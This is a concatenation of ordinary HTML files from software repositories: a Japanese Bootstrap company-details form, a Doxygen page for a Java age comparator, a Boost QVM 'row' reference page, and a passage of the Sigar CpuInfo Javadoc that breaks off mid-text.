aria-hidden="true"></span> テンプレートの編集</a></li> </ul> </div> <div class="col-sm-9 col-sm-offset-3 col-md-10 col-md-offset-2 main"> <h2 class="sub-header">メンテナンス</h2> <form role="form" class="form-horizontal"> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">会社名</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="会社名を入力してください。"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">郵便番号</label> <div class="col-sm-5 col-md-5 form-inline"> <input type="text" class="form-control" id="subject" placeholder="999" maxlength="3"> - <input type="text" class="form-control" id="subject" placeholder="9999" maxlength="4"> </div> <div class="col-sm-5 col-md-5"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">都道府県</label> <div class="col-sm-8 col-md-8"> <select name="prefecture" class="selectpicker"> <optgroup label="北海道・東北"> <option value="1">北海道</option> <option value="2">青森県</option> <option value="3">岩手県</option> <option value="4">宮城県</option> <option value="5">秋田県</option> <option value="6">山形県</option> <option value="7">福島県</option> </optgroup> <optgroup label="関東"> <option value="8">茨城県</option> <option value="9">栃木県</option> <option value="10">群馬県</option> <option value="11">埼玉県</option> <option value="12">千葉県</option> <option value="13">東京都</option> <option value="14">神奈川県</option> </optgroup> <optgroup label="甲信越・北陸"> <option value="15">新潟県</option> <option value="16">富山県</option> <option value="17">石川県</option> <option value="18">福井県</option> <option value="19">山梨県</option> <option value="20">長野県</option> </optgroup> <optgroup label="東海"> <option value="21">岐阜県</option> <option value="22">静岡県</option> <option value="23">愛知県</option> <option value="24">三重県</option> </optgroup> <optgroup label="関西"> <option value="25">滋賀県</option> <option value="26">京都府</option> <option value="27">大阪府</option> <option value="28">兵庫県</option> <option value="29">奈良県</option> <option value="30">和歌山県</option> </optgroup> <optgroup label="中国"> <option value="31">鳥取県</option> <option value="32">島根県</option> <option value="33">岡山県</option> <option value="34">広島県</option> <option value="35">山口県</option> </optgroup> <optgroup label="四国"> <option value="36">徳島県</option> <option value="37">香川県</option> <option value="38">愛媛県</option> <option value="39">高知県</option> </optgroup> <optgroup label="九州・沖縄"> <option value="40">福岡県</option> <option value="41">佐賀県</option> <option value="42">長崎県</option> <option value="43">熊本県</option> <option value="44">大分県</option> <option value="45">宮崎県</option> <option value="46">鹿児島県</option> <option value="47">沖縄県</option> </optgroup> </select> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">住所1</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="住所を入力してください。"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">住所2</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="住所を入力してください。"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">ビル・建物名</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="住所を入力してください。"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">電話番号</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="000-0000-0000"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">担当者</label> <div class="col-sm-8 col-md-8"> <input type="text" class="form-control" id="subject" placeholder="担当者を入力してください。"> </div> <div class="col-sm-c col-md-2"> </div> </div> <div class="form-group"> <label for="subject" class="col-sm-2 col-md-2 text-right control-label">振込口座</label> <div class="col-sm-4 col-md-4 form-inline"> <input type="text" class="form-control" id="subject" placeholder="銀行名"> <input type="radio" value="1" name="gender" id="man"> <label for="man">普通</label> <input type="radio" value="1" name="gender" id="man"> <label for="man">当座</label> </div> <div class="col-sm-4 col-md-4 text-left"> <input type="text" class="form-control" id="subject" placeholder="振込口座を入力してください。"> </div> <div class="col-sm-2 col-md-2"> </div> </div> <div class="form-group"> <button type="button" class="btn btn-primary">登録</button> </div> </form> </div> </div> </div> <!-- Bootstrap core JavaScript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <script src="../js/bootstrap.min.js"></script> <!-- Just to make our placeholder images work. Don't actually copy the next line! --> <script src="../assets/js/vendor/holder.min.js"></script> <!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> <script src="../assets/js/ie10-viewport-bug-workaround.js"></script> <script src="../js/bootstrap-datepicker.js"></script> <script src="../locales/bootstrap-datepicker.ja.min.js"></script> <script src="../js/bootstrap-select.js"></script> <script type="text/javascript"> $(function() { $('.datepicker').datepicker({ format: 'yyyy/mm/dd' , language: 'ja' }); $('.selectpicker').selectpicker({ 'selectedText': 'cat' }); }); </script> </body> </html>
html/d9/dd7/classff__collections_1_1zz___change_key_1_1_cmp.html
kainagel/teach-oop
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.7"/> <title>My Project: ff_collections.zz_ChangeKey.Cmp Class Reference</title> <link href="../../tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="../../jquery.js"></script> <script type="text/javascript" src="../../dynsections.js"></script> <link href="../../search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="../../search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="../../doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">My Project </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.7 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "../../search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="../../index.html"><span>Main&#160;Page</span></a></li> <li><a href="../../namespaces.html"><span>Packages</span></a></li> <li class="current"><a href="../../annotated.html"><span>Classes</span></a></li> <li><a href="../../files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="../../search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="../../search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="../../annotated.html"><span>Class&#160;List</span></a></li> <li><a href="../../classes.html"><span>Class&#160;Index</span></a></li> <li><a href="../../hierarchy.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="../../functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Variables</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="../../dc/d8f/namespaceff__collections.html">ff_collections</a></li><li class="navelem"><a class="el" href="../../dd/da4/namespaceff__collections_1_1zz___change_key.html">zz_ChangeKey</a></li><li class="navelem"><a class="el" href="../../d9/dd7/classff__collections_1_1zz___change_key_1_1_cmp.html">Cmp</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#pub-methods">Public Member Functions</a> &#124; <a href="../../de/d7b/classff__collections_1_1zz___change_key_1_1_cmp-members.html">List of all members</a> </div> <div class="headertitle"> <div class="title">ff_collections.zz_ChangeKey.Cmp Class Reference</div> </div> </div><!--header--> <div class="contents"> <div class="dynheader"> Inheritance diagram for ff_collections.zz_ChangeKey.Cmp:</div> <div class="dyncontent"> <div class="center"><iframe scrolling="no" frameborder="0" src="../../d6/d04/classff__collections_1_1zz___change_key_1_1_cmp__inherit__graph.svg" width="182" height="228"><p><b>This browser is not able to show SVG: try Firefox, Chrome, Safari, or Opera instead.</b></p></iframe> </div> </div> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr class="memitem:ac9e4584d074c08c51f54feef241ba4dd"><td class="memItemLeft" align="right" valign="top">int&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="../../d9/dd7/classff__collections_1_1zz___change_key_1_1_cmp.html#ac9e4584d074c08c51f54feef241ba4dd">compare</a> (Object o1, Object o2)</td></tr> <tr class="separator:ac9e4584d074c08c51f54feef241ba4dd"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"> <p>Definition at line <a class="el" href="../../db/d10/_cmp_8java_source.html#l00004">4</a> of file <a class="el" href="../../db/d10/_cmp_8java_source.html">Cmp.java</a>.</p> </div><h2 class="groupheader">Member Function Documentation</h2> <a class="anchor" id="ac9e4584d074c08c51f54feef241ba4dd"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">int ff_collections.zz_ChangeKey.Cmp.compare </td> <td>(</td> <td class="paramtype">Object&#160;</td> <td class="paramname"><em>o1</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">Object&#160;</td> <td class="paramname"><em>o2</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Definition at line <a class="el" href="../../db/d10/_cmp_8java_source.html#l00005">5</a> of file <a class="el" href="../../db/d10/_cmp_8java_source.html">Cmp.java</a>.</p> <div class="fragment"><div class="line"><a name="l00005"></a><span class="lineno"> 5</span>&#160; {</div> <div class="line"><a name="l00006"></a><span class="lineno"> 6</span>&#160; Agent a1 = (Agent) o1 ;</div> <div class="line"><a name="l00007"></a><span class="lineno"> 7</span>&#160; Agent a2 = (Agent) o2 ;</div> <div class="line"><a name="l00008"></a><span class="lineno"> 8</span>&#160; <span class="keywordflow">if</span> ( a1.getAge() &gt; a2.getAge() ) {</div> <div class="line"><a name="l00009"></a><span class="lineno"> 9</span>&#160; <span class="keywordflow">return</span> 1 ;</div> <div class="line"><a name="l00010"></a><span class="lineno"> 10</span>&#160; } <span class="keywordflow">else</span> <span class="keywordflow">if</span> ( a1.getAge() == a2.getAge() ) {</div> <div class="line"><a name="l00011"></a><span class="lineno"> 11</span>&#160; <span class="keywordflow">return</span> 0 ;</div> <div class="line"><a name="l00012"></a><span class="lineno"> 12</span>&#160; } <span class="keywordflow">else</span> {</div> <div class="line"><a name="l00013"></a><span class="lineno"> 13</span>&#160; <span class="keywordflow">return</span> -1 ;</div> <div class="line"><a name="l00014"></a><span class="lineno"> 14</span>&#160; }</div> <div class="line"><a name="l00015"></a><span class="lineno"> 15</span>&#160; }</div> </div><!-- fragment --> </div> </div> <hr/>The documentation for this class was generated from the following file:<ul> <li><a class="el" href="../../db/d10/_cmp_8java_source.html">Cmp.java</a></li> </ul> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Tue Dec 6 2016 10:08:52 for My Project by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="../../doxygen.png" alt="doxygen"/> </a> 1.8.7 </small></address> </body> </html>
myodd/boost/libs/qvm/doc/row.html
FFMG/myoddweb.piger
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'/> <title>row</title> <link href='reno.css' type='text/css' rel='stylesheet'/> </head> <body> <div class="body-0"> <div class="body-1"> <div class="body-2"> <div> <h1>QVM: Quaternions, Vectors, Matrices</h1> </div> <!-- Copyright (c) 2008-2016 Emil Dotchevski and Reverge Studios, Inc. --> <!-- Distributed under the Boost Software License, Version 1.0. (See accompanying --> <!-- file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) --> <div class="RenoIncludeDIV"><div class="RenoAutoDIV"><h3>row</h3> </div> <div class="RenoIncludeDIV"><p><span class="RenoEscape">&#35;<!--<wiki>`&#35;</wiki>--></span>include &lt;<span class="RenoLink"><a href="boost_qvm_map_mat_vec_hpp.html">boost/qvm/map_mat_vec.hpp</a></span>&gt;</p> <pre>namespace boost { namespace <span class="RenoLink"><a href="qvm.html">qvm</a></span> { <span class="RenoIncludeSPAN"> //Only <span class="RenoLink"><a href="SFINAE_enable_if.html">enabled if</a></span>: <span class="RenoLink"><a href="is_mat.html">is_mat</a></span>&lt;A&gt;::value template &lt;int C,class A&gt; -unspecified-return-type- <span class="RenoLink">row</span>( A &amp; a );</span> } }</pre> </div><p>The expression <i><span class="RenoLink">row</span>&lt;R&gt;(m)</i> returns a <span class="RenoLink"><a href="view_proxy.html">view proxy</a></span> that accesses row <i>R</i> of the matrix <i>m</i> as a vector.</p> </div><div class="RenoAutoDIV"><div class="RenoHR"><hr/></div> See also: <span class="RenoPageList"><a href="boost_qvm_map_mat_vec_hpp.html">boost/qvm/map_mat_vec.hpp</a></span> </div> <!-- Copyright (c) 2008-2016 Emil Dotchevski and Reverge Studios, Inc. --> <!-- Distributed under the Boost Software License, Version 1.0. (See accompanying --> <!-- file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) --> <div id="footer"> <p> <a class="logo" href="http://jigsaw.w3.org/css-validator/check/referer"><img class="logo_pic" src="valid-css.png" alt="Valid CSS" height="31" width="88"/></a> <a class="logo" href="http://validator.w3.org/check?uri=referer"><img class="logo_pic" src="valid-xhtml.png" alt="Valid XHTML 1.0" height="31" width="88"/></a> <small>Copyright (c) 2008-2016 by Emil Dotchevski and Reverge Studios, Inc.<br/> Distributed under the <a href="http://www.boost.org/LICENSE_1_0.txt">Boost Software License, Version 1.0</a>.</small> </p> </div> </div> </div> </div> </body> </html>
docs/javadoc/org/hyperic/sigar/CpuInfo.html
gitpan/hyperic-sigar
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_13) on Thu Jul 09 06:46:48 PDT 2009 --> <TITLE> CpuInfo (Sigar API) </TITLE> <META NAME="date" CONTENT="2009-07-09"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="CpuInfo (Sigar API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/hyperic/sigar/Cpu.html" title="class in org.hyperic.sigar"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/hyperic/sigar/CpuPerc.html" title="class in org.hyperic.sigar"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/hyperic/sigar/CpuInfo.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="CpuInfo.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.hyperic.sigar</FONT> <BR> Class CpuInfo</H2> <PRE> java.lang.Object <IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>org.hyperic.sigar.CpuInfo</B> </PRE> <DL> <DT><B>All Implemented Interfaces:</B> <DD>java.io.Serializable</DD> </DL> <HR> <DL> <DT><PRE>public class <B>CpuInfo</B><DT>extends java.lang.Object<DT>implements java.io.Serializable</DL> </PRE> <P> CpuInfo sigar class. <P> <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../serialized-form.html#org.hyperic.sigar.CpuInfo">Serialized Form</A></DL> <HR> <P> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <A NAME="constructor_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Constructor Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#CpuInfo()">CpuInfo</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#gather(org.hyperic.sigar.Sigar)">gather</A></B>(<A HREF="../../../org/hyperic/sigar/Sigar.html" title="class in org.hyperic.sigar">Sigar</A>&nbsp;sigar)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;long</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getCacheSize()">getCacheSize</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the CPU cache size.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getCoresPerSocket()">getCoresPerSocket</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the Number of CPU cores per CPU socket.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getMhz()">getMhz</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the CPU speed.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.lang.String</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getModel()">getModel</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the CPU model.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getTotalCores()">getTotalCores</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the Total CPU cores (logical).</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;int</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getTotalSockets()">getTotalSockets</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the Total CPU sockets (physical).</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.lang.String</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#getVendor()">getVendor</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Get the CPU vendor id.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Map</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#toMap()">toMap</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.lang.String</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../org/hyperic/sigar/CpuInfo.html#toString()">toString</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ========= CONSTRUCTOR DETAIL ======== --> <A NAME="constructor_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Constructor Detail</B></FONT></TH> </TR> </TABLE> <A NAME="CpuInfo()"><!-- --></A><H3> CpuInfo</H3> <PRE> public <B>CpuInfo</B>()</PRE> <DL> </DL> <!-- ============ METHOD DETAIL ========== --> <A NAME="method_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Method Detail</B></FONT></TH> </TR> </TABLE> <A NAME="gather(org.hyperic.sigar.Sigar)"><!-- --></A><H3> gather</H3> <PRE> public void <B>gather</B>(<A HREF="../../../org/hyperic/sigar/Sigar.html" title="class in org.hyperic.sigar">Sigar</A>&nbsp;sigar) throws <A HREF="../../../org/hyperic/sigar/SigarException.html" title="class in org.hyperic.sigar">SigarException</A></PRE> <DL> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Throws:</B> <DD><CODE><A HREF="../../../org/hyperic/sigar/SigarException.html" title="class in org.hyperic.sigar">SigarException</A></CODE></DL> </DD> </DL> <HR> <A NAME="getVendor()"><!-- --></A><H3> getVendor</H3> <PRE> public java.lang.String <B>getVendor</B>()</PRE> <DL> <DD>Get the CPU vendor id.<p> Supported Platforms: AIX, FreeBSD, Linux, HPUX, Solaris, Win32. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo -v</code><br> <li> Win32: <code></code><br> </ul> <P> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>CPU vendor id</DL> </DD> </DL> <HR> <A NAME="getModel()"><!-- --></A><H3> getModel</H3> <PRE> public java.lang.String <B>getModel</B>()</PRE> <DL> <DD>Get the CPU model.<p> Supported Platforms: AIX, FreeBSD, Linux, HPUX, Solaris, Win32. <p> System equivalent commands:<ul> <li> AIX: <code>lsattr -El proc0</code><br> <li> Darwin: <code></code><br> <li> FreeBSD: <code></code><br> <li> HPUX: <code></code><br> <li> Linux: <code>cat /proc/cpuinfo</code><br> <li> Solaris: <code>psrinfo 